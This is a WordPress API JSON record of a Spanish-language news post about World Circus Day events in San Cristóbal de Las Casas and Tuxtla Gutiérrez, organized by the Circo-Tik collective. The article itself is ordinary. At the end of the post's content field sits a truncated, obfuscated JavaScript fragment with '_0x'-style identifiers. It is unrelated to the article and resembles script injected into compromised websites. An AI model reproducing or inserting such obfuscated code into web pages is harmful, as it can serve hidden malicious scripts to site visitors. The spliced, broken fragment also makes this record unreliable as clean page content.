{"id":15215,"date":"2024-04-19T01:13:03","date_gmt":"2024-04-19T01:13:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15215"},"modified":"2024-04-19T01:13:04","modified_gmt":"2024-04-19T01:13:04","slug":"celebraran-dia-mundial-del-circo-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15215","title":{"rendered":"Celebrar\u00e1n D\u00eda Mundial del Circo en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"645\" height=\"595\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240418-WA0014.jpg\" alt=\"\" class=\"wp-image-15216\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240418-WA0014.jpg 645w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/IMG-20240418-WA0014-300x277.jpg 300w\" sizes=\"auto, (max-width: 645px) 100vw, 645px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>18 de abril del 2024. San Crist\u00f3bal de Las Casas.- En conmemoraci\u00f3n del D\u00eda Mundial del Circo, Laura Villa, miembro destacado de Circo-Tik, un colectivo con base en Tojolabal, anunci\u00f3 una serie de eventos circenses en Tuxtla Guti\u00e9rrez y San Crist\u00f3bal de Las Casas.<\/p>\n\n\n\n<p>En entrevista, extendi\u00f3 una cordial invitaci\u00f3n a todos para unirse a la celebraci\u00f3n del D\u00eda del Circo el 20 de abril. &#8220;El evento promete una variedad de funciones, espect\u00e1culos, talleres y conferencias. En San Crist\u00f3bal, se planea un evento especial el 28 de abril en Wapan\u00ed Flavio A. Paniagua n\u00famero 10, donde se presentar\u00e1 una impresionante danza a\u00e9rea. El programa incluir\u00e1 la participaci\u00f3n de artistas invitados, entre ellos payasos y malabaristas, con la esperanza de brindar un espect\u00e1culo inolvidable para todos los asistentes, destacando la diversidad de disciplinas que ofrece el circo&#8221;.<\/p>\n\n\n\n<p>Asimismo, dijo que antes de la gran celebraci\u00f3n en San Crist\u00f3bal, Tuxtla Guti\u00e9rrez albergar\u00e1 una serie de actividades circenses. &#8220;Circo-Tik ha sido invitado al Telet\u00f3n para ofrecer un espect\u00e1culo que incluir\u00e1 danza a\u00e9rea y la participaci\u00f3n de payasos. Este evento est\u00e1 dise\u00f1ado como un regalo especial para los ni\u00f1os atendidos en el Telet\u00f3n, y tambi\u00e9n refleja el compromiso del colectivo con el circo social, colaborando con organizaciones como Derechos por las Infancias para llevar el arte circense a ni\u00f1os en situaci\u00f3n de vulnerabilidad&#8221;.<\/p>\n\n\n\n<p>&#8220;La celebraci\u00f3n del D\u00eda Mundial del Circo en Chiapas promete ser una experiencia enriquecedora y emocionante para todos, destacando la capacidad del circo para unir a las comunidades y llevar alegr\u00eda a aquellos que m\u00e1s lo necesitan&#8221;, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 18 de abril del 2024. San Crist\u00f3bal de Las Casas.- En conmemoraci\u00f3n del D\u00eda Mundial del Circo, Laura Villa, miembro destacado de Circo-Tik, un colectivo con base en Tojolabal, anunci\u00f3 una serie de eventos circenses en Tuxtla Guti\u00e9rrez y San Crist\u00f3bal de Las Casas. En entrevista, extendi\u00f3 una cordial invitaci\u00f3n a todos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15216,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15215","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15215","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15215"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15215\/revisions"}],"predecessor-version":[{"id":15217,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15215\/revisions\/15217"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15216"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15215"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15215"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15215"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}